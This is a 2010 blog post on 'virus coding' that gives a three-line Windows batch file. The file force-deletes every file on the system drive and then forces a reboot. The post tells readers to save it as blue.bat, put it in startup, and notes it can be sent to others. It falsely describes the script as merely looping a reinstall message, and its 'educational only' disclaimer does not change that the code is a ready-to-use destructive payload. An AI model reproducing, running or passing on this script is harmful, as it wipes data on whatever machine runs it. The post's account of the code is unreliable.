Tuesday, March 16, 2010

Virus Coding

Blue screen of Death

                    By Somnath Singh

Note:-  This is totally intended for educational purpose only. I am no way responsible if you end up  corrupting  your system.  Read the DISCLAIMER section of  this site before you proceed.
 
The Blue Screen Of Death can be coded and sent to you like any application. It is up to you to be carefull and try to reveal the trick before getting in serious trouble. It loops a message asking to re-install ur windows again

Type the following code in a notepad and save it as blue.bat. Put it in the start up and see how Windows gets corrupted. if you know the Windows batch programming the logic of the program will be clear to you.


@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

No comments:

Post a Comment